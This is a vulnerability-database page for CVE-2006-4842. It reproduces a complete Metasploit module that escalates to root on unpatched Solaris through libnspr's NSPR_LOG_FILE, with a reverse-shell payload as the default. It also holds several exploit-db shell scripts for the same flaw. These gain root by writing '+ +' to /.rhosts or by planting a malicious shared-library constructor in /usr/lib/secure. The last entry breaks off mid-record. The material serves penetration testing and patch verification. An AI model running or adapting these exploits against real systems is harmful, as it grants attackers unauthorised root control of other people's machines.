Solaris libnspr NSPR_LOG_FILE Privilege Escalation
2018-09-18T00:00:00
ID PACKETSTORM:149416 Type packetstorm Reporter Marco Ivaldi Modified 2018-09-18T00:00:00
Description
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
'Description' => %q{
This module exploits an arbitrary file write vulnerability in the
Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
prior to Solaris 10u3 which allows users to gain root privileges.
libnspr versions prior to 4.6.3 allow users to specify a log file with
the `NSPR_LOG_FILE` environment variable. The log file is created with
the privileges of the running process, resulting in privilege escalation
when used in combination with a SUID executable.
This module writes a shared object to the trusted library directory
`/usr/lib/secure` and runs the specified SUID binary with the shared
object loaded using the `LD_LIBRARY_PATH` environment variable.
This module has been tested successfully with libnspr version 4.5.1
on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
},
'References' =>
[
['BID', '20471'],
['CVE', '2006-4842'],
['EDB', '2543'],
['EDB', '2569'],
['EDB', '2641'],
['URL', 'https://securitytracker.com/id/1017050'],
['URL', 'https://securitytracker.com/id/1017051'],
['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
],
'License' => MSF_LICENSE,
'Author' =>
[
'iDefense', # Discovery
'Marco Ivaldi', # Exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 11 2006',
'Privileged' => true,
'Platform' => ['solaris'],
'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
'Targets' => [['Auto', {}]],
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' =>
{
'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
# Some useful example SUID executables:
# * /usr/bin/cancel
# * /usr/bin/chkey
# * /usr/bin/lp
# * /usr/bin/lpset
# * /usr/bin/lpstat
# * /usr/lib/lp/bin/netpr
# * /usr/sbin/lpmove
OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def suid_bin_path
datastore['SUID_PATH']
end
def is_writable?(path)
cmd_exec("[ -w #{path} ] && echo true").include? 'true'
end
def mkdir(path)
vprint_status "Creating directory '#{path}'"
cmd_exec "mkdir -p '#{path}'"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_file_for_cleanup path
end
def check
unless setuid? suid_bin_path
vprint_error "#{suid_bin_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{suid_bin_path} is setuid"
unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
# libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable
# Earlier versions may also be vulnerable
libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'
libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\s+([\d\.]+),/).flatten.first
if libnspr_pkg_version.to_s.eql? ''
vprint_error 'Could not determine libnspr version'
return CheckCode::Unknown
end
if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')
vprint_error "libnspr version #{libnspr_pkg_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "libnspr version #{libnspr_pkg_version} appears to be vulnerable"
# Solaris 10 versions prior to the 2006 patches are known to be vulnerable.
# Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,
# however third-party software may also introduce a vulnerable version of the library.
version = kernel_release
if version.to_s.eql? ''
vprint_error 'Could not determine Solaris version'
return CheckCode::Detected
end
unless Gem::Version.new(version) <= Gem::Version.new('5.10')
vprint_error "Solaris version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Solaris version #{version} appears to be vulnerable"
# The vulnerability was patched in various Solaris patches for different platforms.
# For more information, see:
# - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1
installed_patches = cmd_exec 'showrev -p'
[
119214, # Solaris 10 (x86) patch 119214-10
119213, # Solaris 10 (SPARC) patch 119213-10
119212, # Solaris 9 (x86) patch 119212-10
119211, # Solaris 9 (SPARC) patch 119211-10
119209 # Solaris 8 (SPARC) patch 119209-10
].each do |patch|
if installed_patches =~ / #{patch}-(\d+)/
revision = $1.to_i
if revision >= 10
vprint_error "Solaris patch #{patch}-#{revision} has been applied"
return CheckCode::Safe
end
end
end
vprint_good 'Solaris patches are not installed'
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless is_writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
# Create writable file in /usr/lib/secure
lib_path = '/usr/lib/secure'
lib_name = 'libldap.so.5'
vprint_status "Creating file #{lib_path}/#{lib_name}"
cmd_exec 'umask 0'
cmd_exec "NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\"#{lib_path}/#{lib_name}\" #{suid_bin_path}"
cmd_exec "NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}"
cmd_exec 'umask 022'
unless is_writable? "#{lib_path}/#{lib_name}"
fail_with Failure::Unknown, "Could not create file '#{lib_path}/#{lib_name}'"
end
print_good "Created file #{lib_path}/#{lib_name}"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and compile shared object
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"
so = <<-EOF
void __attribute__((constructor)) cons() {
setuid(0);
setgid(0);
execle("#{payload_path}", "", 0, 0);
_exit(0);
}
EOF
so_name = ".#{rand_text_alphanumeric 5..10}"
so_path = "#{base_path}/#{so_name}"
upload_and_compile so_path, so
vprint_status "Writing shared object #{lib_path}/#{lib_name}"
cmd_exec "cp '#{so_path}' '#{lib_path}/#{lib_name}'"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and execute payload
upload payload_path, generate_payload_exe
cmd_exec "chmod +x #{payload_path}"
print_status 'Executing payload...'
cmd_exec "LD_LIBRARY_PATH=\"#{lib_path}\" #{suid_bin_path} & echo "
end
end
`
{"id": "PACKETSTORM:149416", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation", "description": "", "published": "2018-09-18T00:00:00", "modified": "2018-09-18T00:00:00", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/149416/Solaris-libnspr-NSPR_LOG_FILE-Privilege-Escalation.html", "reporter": "Marco Ivaldi", "references": [], "cvelist": ["CVE-2006-4842"], "lastseen": "2018-09-18T10:03:46", "viewCount": 25, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-09-18T10:03:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4842"]}, {"type": "exploitdb", "idList": ["EDB-ID:28788", "EDB-ID:28789", "EDB-ID:2569", "EDB-ID:2641", "EDB-ID:45433", "EDB-ID:2543"]}, {"type": "seebug", "idList": ["SSV:64170", "SSV:5260", "SSV:64104", "SSV:3899", "SSV:82335", "SSV:82336", "SSV:16657", "SSV:64124", "SSV:5298"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2A9D47E1F6624AC9BF9BB6A1948A6B9A", "EXPLOITPACK:ABFA17484219E850FDCB9E3C93B96A12", "EXPLOITPACK:0A06BEDE6DDAF9E385796FE859D61F71", "EXPLOITPACK:BF4CC01D6A1DE78B9EEA2F44B218D100", "EXPLOITPACK:17D069ABD6EE3DA02F1E1EC965F0B525"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/LOCAL/LIBNSPR_NSPR_LOG_FILE_PRIV_ESC"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14651"]}, {"type": "osvdb", "idList": ["OSVDB:29610"]}, {"type": "zdt", "idList": ["1337DAY-ID-31125"]}, {"type": "canvas", "idList": ["CVE_2006_4842"]}, {"type": "nessus", "idList": ["SOLARIS10_X86_119214-30.NASL", "SOLARIS10_X86_119214-36.NASL", "SOLARIS10_X86_119214.NASL", "SOLARIS10_X86_119214-33.NASL", "SOLARIS10_119213-30.NASL", "SOLARIS10_119213-31.NASL", "SOLARIS10_X86_119214-31.NASL", "SOLARIS10_X86_119214-32.NASL", "SOLARIS10_119213.NASL", "SOLARIS10_119213-36.NASL"]}], "modified": "2018-09-18T10:03:46", "rev": 2}, "vulnersScore": 6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/149416/libnspr_nspr_log_file_priv_esc.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Solaris::Priv \ninclude Msf::Post::Solaris::System \ninclude Msf::Post::Solaris::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation', \n'Description' => %q{ \nThis module exploits an arbitrary file write vulnerability in the \nNetscape Portable Runtime library (libnspr) on unpatched Solaris systems \nprior to Solaris 10u3 which allows users to gain root privileges. \n \nlibnspr versions prior to 4.6.3 allow users to specify a log file with \nthe `NSPR_LOG_FILE` environment variable. The log file is created with \nthe privileges of the running process, resulting in privilege escalation \nwhen used in combination with a SUID executable. \n \nThis module writes a shared object to the trusted library directory \n`/usr/lib/secure` and runs the specified SUID binary with the shared \nobject loaded using the `LD_LIBRARY_PATH` environment variable. \n \nThis module has been tested successfully with libnspr version 4.5.1 \non Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86). \n}, \n'References' => \n[ \n['BID', '20471'], \n['CVE', '2006-4842'], \n['EDB', '2543'], \n['EDB', '2569'], \n['EDB', '2641'], \n['URL', 'https://securitytracker.com/id/1017050'], \n['URL', 'https://securitytracker.com/id/1017051'], \n['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'], \n['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'], \n['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1'] \n], \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'iDefense', # Discovery \n'Marco Ivaldi', # Exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Oct 11 2006', \n'Privileged' => true, \n'Platform' => ['solaris'], \n'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC], \n'Targets' => [['Auto', {}]], \n'SessionTypes' => ['shell', 'meterpreter'], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'solaris/x86/shell_reverse_tcp', \n'WfsDelay' => 10, \n'PrependFork' => true \n}, \n'DefaultTarget' => 0)) \nregister_options [ \n# Some useful example SUID executables: \n# * /usr/bin/cancel \n# * /usr/bin/chkey \n# * /usr/bin/lp \n# * /usr/bin/lpset \n# * /usr/bin/lpstat \n# * /usr/lib/lp/bin/netpr \n# * /usr/sbin/lpmove \nOptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel']) \n] \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef suid_bin_path \ndatastore['SUID_PATH'] \nend \n \ndef is_writable?(path) \ncmd_exec(\"[ -w #{path} ] && echo true\").include? 'true' \nend \n \ndef mkdir(path) \nvprint_status \"Creating directory '#{path}'\" \ncmd_exec \"mkdir -p '#{path}'\" \nregister_dir_for_cleanup path \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \n \noutput = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\" \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \nregister_file_for_cleanup path \nend \n \ndef check \nunless setuid? suid_bin_path \nvprint_error \"#{suid_bin_path} is not setuid\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{suid_bin_path} is setuid\" \n \nunless has_gcc? \nvprint_error 'gcc is not installed' \nreturn CheckCode::Safe \nend \nvprint_good 'gcc is installed' \n \n# libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable \n# Earlier versions may also be vulnerable \nlibnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr' \nlibnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first \nif libnspr_pkg_version.to_s.eql? '' \nvprint_error 'Could not determine libnspr version' \nreturn CheckCode::Unknown \nend \n \nif Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3') \nvprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\" \n \n# Solaris 10 versions prior to the 2006 patches are known to be vulnerable. \n# Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default, \n# however third-party software may also introduce a vulnerable version of the library. \nversion = kernel_release \nif version.to_s.eql? '' \nvprint_error 'Could not determine Solaris version' \nreturn CheckCode::Detected \nend \n \nunless Gem::Version.new(version) <= Gem::Version.new('5.10') \nvprint_error \"Solaris version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Solaris version #{version} appears to be vulnerable\" \n \n# The vulnerability was patched in various Solaris patches for different platforms. \n# For more information, see: \n# - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1 \ninstalled_patches = cmd_exec 'showrev -p' \n[ \n119214, # Solaris 10 (x86) patch 119214-10 \n119213, # Solaris 10 (SPARC) patch 119213-10 \n119212, # Solaris 9 (x86) patch 119212-10 \n119211, # Solaris 9 (SPARC) patch 119211-10 \n119209 # Solaris 8 (SPARC) patch 119209-10 \n].each do |patch| \nif installed_patches =~ / #{patch}-(\\d+)/ \nrevision = $1.to_i \nif revision >= 10 \nvprint_error \"Solaris patch #{patch}-#{revision} has been applied\" \nreturn CheckCode::Safe \nend \nend \nend \nvprint_good 'Solaris patches are not installed' \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless [CheckCode::Detected, CheckCode::Appears].include? check \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nunless is_writable? datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \n# Create writable file in /usr/lib/secure \nlib_path = '/usr/lib/secure' \nlib_name = 'libldap.so.5' \n \nvprint_status \"Creating file #{lib_path}/#{lib_name}\" \ncmd_exec 'umask 0' \ncmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\" \ncmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\" \ncmd_exec 'umask 022' \n \nunless is_writable? \"#{lib_path}/#{lib_name}\" \nfail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\" \nend \n \nprint_good \"Created file #{lib_path}/#{lib_name}\" \nregister_file_for_cleanup \"#{lib_path}/#{lib_name}\" \n \n# Upload and compile shared object \nbase_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\" \nmkdir base_path \n \npayload_name = \".#{rand_text_alphanumeric 5..10}\" \npayload_path = \"#{base_path}/#{payload_name}\" \n \nso = <<-EOF \nvoid __attribute__((constructor)) cons() { \nsetuid(0); \nsetgid(0); \nexecle(\"#{payload_path}\", \"\", 0, 0); \n_exit(0); \n} \nEOF \n \nso_name = \".#{rand_text_alphanumeric 5..10}\" \nso_path = \"#{base_path}/#{so_name}\" \nupload_and_compile so_path, so \n \nvprint_status \"Writing shared object #{lib_path}/#{lib_name}\" \ncmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\" \nregister_file_for_cleanup \"#{lib_path}/#{lib_name}\" \n \n# Upload and execute payload \nupload payload_path, generate_payload_exe \ncmd_exec \"chmod +x #{payload_path}\" \n \nprint_status 'Executing payload...' \ncmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \" \nend \nend \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "The Netscape Portable Runtime (NSPR) API 4.6.1 and 4.6.2, as used in Sun Solaris 10, trusts user-specified environment variables for specifying log files even when running from setuid programs, which allows local users to create or overwrite arbitrary files.", "edition": 4, "cvss3": {}, "published": "2006-10-12T00:07:00", "title": "CVE-2006-4842", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4842"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/o:sun:solaris:10.0", "cpe:/a:netscape:portable_runtime_api:4.6.1", "cpe:/a:netscape:portable_runtime_api:4.6.2"], "id": "CVE-2006-4842", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4842", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sun:solaris:10.0:*:sparc:*:*:*:*:*", "cpe:2.3:a:netscape:portable_runtime_api:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:netscape:portable_runtime_api:4.6.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:30:50", "description": "Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit. CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Solaris 10 libnspr - Arbitrary File Creation Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:2543", "href": "https://www.exploit-db.com/exploits/2543/", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho \"+ +\" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n# milw0rm.com [2006-10-13]\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2543/"}, {"lastseen": "2016-01-31T16:43:23", "description": "Solaris 10 libnspr constructor Local Root Exploit. CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-24T00:00:00", "type": "exploitdb", "title": "Solaris 10 libnspr - constructor Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EDB-ID:2641", "href": "https://www.exploit-db.com/exploits/2641/", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\r\necho \" setuid(0);\" >> /tmp/ctors.c\r\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\r\necho \"}\" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo \"problems compiling evil shared library, check your gcc\"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n# milw0rm.com [2006-10-24]\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2641/"}, {"lastseen": "2016-02-03T08:55:56", "description": "Sun Solaris Netscape Portable Runtime API 4.6.1 Local Privilege Escalation Vulnerability (1). CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28788", "href": "https://www.exploit-db.com/exploits/28788/", "sourceData": "source: http://www.securityfocus.com/bid/20471/info\r\n\r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n\r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n\r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho \"+ +\" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28788/"}, {"lastseen": "2016-02-03T08:56:04", "description": "Sun Solaris Netscape Portable Runtime API 4.6.1 Local Privilege Escalation Vulnerability (2). CVE-2006-4842. Local exploit for solaris 